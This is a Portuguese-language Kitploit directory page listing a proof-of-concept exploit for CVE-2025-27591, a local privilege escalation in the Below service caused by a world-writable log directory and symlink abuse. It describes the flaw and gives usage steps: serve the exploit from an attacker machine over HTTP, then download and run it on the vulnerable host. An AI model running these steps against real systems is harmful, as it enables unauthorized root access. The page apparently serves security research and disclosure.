Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-27591-PoC — CVE-2025-27591 é uma vulnerabilidade de escalonamento de privilégios que afetou o serviço Below antes da versão 0.9.0 | Kitploit
Ferramentas/GitHubGitHub/bridgeralderson/cve-2025-27591-poc
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e Educação
GitHubbridgeralderson/cve-2025-27591-poc

CVE-2025-27591-PoC

CVE-2025-27591 é uma vulnerabilidade de escalonamento de privilégios que afetou o serviço Below antes da versão 0.9.0

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
3221há 1 anoRevisado pelo Kitploit

CVE-2025-27591 Prova de Conceito

CVE-2025-27591 é uma vulnerabilidade de escalada de privilégio que afetou o serviço Below antes da versão 0.9.0. O problema surgiu devido à criação de um diretório com permissão de escrita global em /var/log/below. Um atacante poderia explorar essa vulnerabilidade manipulando symlinks dentro deste diretório e potencialmente obter privilégios de root, tornando-se uma preocupação significativa de segurança para usuários locais sem privilégios.

Esta Prova de Conceito foi escrita apenas para fins educacionais e de pesquisa.

No momento da escrita, não existia nenhuma PoC publicamente disponível para esta vulnerabilidade na comunidade. Portanto, decidi compartilhar esta implementação de forma responsável para preencher essa lacuna, contribuir para o ecossistema de pesquisa em segurança e aumentar a conscientização sobre a natureza crítica de sistemas de arquivos inseguros.

Causa da Vulnerabilidade

image

Prova de Conceito

Da máquina do atacante:

1-git clone https://github.com/BridgerAlderson/CVE-2025-27591-PoC.git

2-cd CVE-2025-27591-PoC

3-python3 -m http.server 80

Do sistema vulnerável:

1- wget http:///exploit.py

2-python exploit.py

image

Referências

https://www.facebook.com/security/advisories/cve-2025-27591 https://github.com/facebookincubator/below/commit/da9382e6e3e332fd2c3195e22f34977f83f0f1f3

Baixar ferramenta